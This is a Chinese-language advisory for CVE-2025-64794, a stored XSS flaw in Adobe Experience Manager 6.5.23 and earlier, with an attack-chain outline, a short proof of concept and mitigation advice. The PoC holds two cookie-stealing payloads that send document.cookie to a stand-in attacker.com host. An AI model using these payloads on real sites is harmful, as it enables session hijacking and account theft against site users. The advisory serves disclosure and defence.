CVE-2025-64794: Adobe Experience Manager存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64794

漏洞类型

存储型XSS (Stored Cross-Site Scripting)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager 6.5

漏洞概述

CVE-2025-64794是Adobe Experience Manager中的一个存储型跨站脚本(XSS)漏洞。该漏洞影响6.5.23及更早版本，允许低权限攻击者将恶意JavaScript脚本注入到存在漏洞的表单字段中。当受害者在浏览器中访问包含该恶意字段的页面时，注入的脚本会自动执行，从而窃取用户会话cookie、劫持用户账户、进行钓鱼攻击或执行其他恶意操作。由于是存储型XSS，恶意脚本会持久保存在服务器端，所有访问该页面的用户都可能受到影响，具有较高的危害性。

技术细节

该漏洞为存储型XSS(Stored XSS)，攻击流程如下：1)攻击者以低权限用户身份登录Adobe Experience Manager系统；2)攻击者在存在漏洞的表单字段中注入恶意JavaScript代码(如<script>alert(document.cookie)</script>)；3)由于系统未对用户输入进行充分的输入验证和输出编码，恶意脚本被存储在服务器端；4)当其他用户访问包含该表单字段的页面时，服务器将未经过滤的数据返回给用户浏览器；5)浏览器将恶意脚本作为页面内容的一部分解析执行，从而触发XSS攻击。攻击者可利用此漏洞窃取受害者的认证凭证、获取敏感数据或在用户上下文中执行任意操作。修复方案需要在数据输入时进行严格过滤，并在数据输出时进行适当的HTML实体编码。

攻击链分析

STEP 1

信息收集

攻击者识别Adobe Experience Manager版本，确认版本号<=6.5.23

STEP 2

账户获取

攻击者获取系统低权限账户(如内容作者或普通用户)

STEP 3

漏洞探测

攻击者识别存在漏洞的表单字段，通常为富文本编辑器或自定义表单组件

STEP 4

恶意脚本注入

攻击者将恶意JavaScript代码注入到表单字段中并提交，脚本被存储在服务器数据库

STEP 5

等待触发

当受害者访问包含该表单字段的页面时，服务器将恶意脚本随页面内容一同返回

STEP 6

脚本执行

受害者浏览器解析页面时执行恶意JavaScript，攻击者可窃取cookie、劫持会话或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-64794 PoC - Adobe Experience Manager Stored XSS
// Author: Security Researcher
// Target: Adobe Experience Manager 6.5.23 and earlier

// Step 1: Identify vulnerable form field
// Login to AEM with low-privileged account and navigate to form submission page

// Step 2: Inject malicious JavaScript payload into form field
const maliciousPayload = '<script>\n' +
    '  // Steal session cookies\n' +
    '  var cookies = document.cookie;\n' +
    '  var xhr = new XMLHttpRequest();\n' +
    '  xhr.open("POST", "https://attacker.com/collect", true);\n' +
    '  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");\n' +
    '  xhr.send("data=" + encodeURIComponent(cookies));\n' +
    '</script>';

// Step 3: Submit the form with payload
// The payload is stored in the database without proper sanitization

// Step 4: When victim visits the page, script executes
// Example of more sophisticated payload:
const advancedPayload = '<img src=x onerror="fetch(\'https://attacker.com/api/v1/steal?c=\'+document.cookie).then(r=>r.text()).then(d=>console.log(d))">';

// Mitigation: Input validation and output encoding should be applied
// HTML entity encoding for output: < becomes &lt;, > becomes &gt;, etc.

影响范围

Adobe Experience Manager 6.5.23及更早版本

AEM 6.5.x < 6.5.24

防御指南

临时缓解措施

临时缓解措施：在WAF(Web应用防火墙)上配置规则，对包含<script>标签、javascript:伪协议、onerror/onload等XSS特征的请求进行拦截和过滤；限制低权限用户对富文本编辑器和自定义表单组件的访问权限；启用X-XSS-Protection响应头；监控日志中的可疑XSS攻击特征。